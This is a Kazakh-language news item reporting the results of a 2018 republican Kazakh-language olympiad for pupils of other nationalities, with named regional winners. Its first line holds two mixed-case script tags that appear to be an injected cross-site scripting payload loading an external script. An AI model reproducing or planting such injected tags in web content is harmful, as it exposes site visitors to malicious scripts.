<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

22.01.2018

Өзге ұлттардың 5-10

сынып оқушылары арасында «Тіл – мемлекет тәуелсіздігінің символы» атты ХІ

республикалық қашықтық олимпиаданың қорытындылары туралы

ақпарат

 

 

                2018 жылдың 3-5 қаңтар  аралығында Астана қаласы  «Нұр Орда» мектеп-лицейінде өзге ұлттардың 5-10 сынып оқушылары арасында «Тіл – мемлекет тәуелсіздігінің символы» атты ХI республикалық қашықтық олимпиада  өткізілді. 

Олимпиаданың мақсаты мемлекеттік тілді интеллектуалдық және рухани дамуы және қарым-қатынас құралы ретінде еркін меңгеретін лингвистикалық қабілеті жоғары және қазақ тілін үйренуге талаптанатын оқушыларды  анықтау және қолдау болып табылады.

         Ақмола облысынан жоғары ұпай жинаған 5-10 сыныптар арасында қашықтықтан өткізілген айналым қатысушыларының 6 оқушы олимпиаданың  қорытынды айналымына қатысты.

Олимпиадаға қатысудың қорытындысы бойынша біздің облыстан  2 оқушы жеңімпаз атанды, олардың ішінде 1 оқушы - екінші орын, 1 оқушы - үшінші орын. 4 оқушы грамотамен марапатталды. Олардың пән мұғалімдеріне алғыс хат берілді.

ІІ дәрежелі дипломмен Степногорск қаласы, ДБАОММИ№4 «Болашақ»  10 сынып оқушысы Артур Савлук марапатталды;

ІІІ дәрежелі дипломмен Көкшетау қаласы, №16 орта мектебінің 6  сынып оқушысы Алина Арешета марапатталды;

Грамоталармен Астана қаласы, ДБАОММИ№2 7 сынып оқушысы Фатима Ибрагимова және 9 сынып оқушысы Стариненко Андрей, Жақсы ауданы, №2 орта мектебінің 10 сынып оқушысы Владимир Бочарников және Өскенбаев ат.Қима мектеп-бақшасының 7 сынып оқушысы Дарья Чореску марапатталды.

Республикалық олимпиаданың  қорытынды айналымының жеңімпаздарын құттықтаймыз, болашақта табыс тілейміз!

 

 

Просмотров: 467


Пікір қосу



Деректерді қолтаңбаға қосу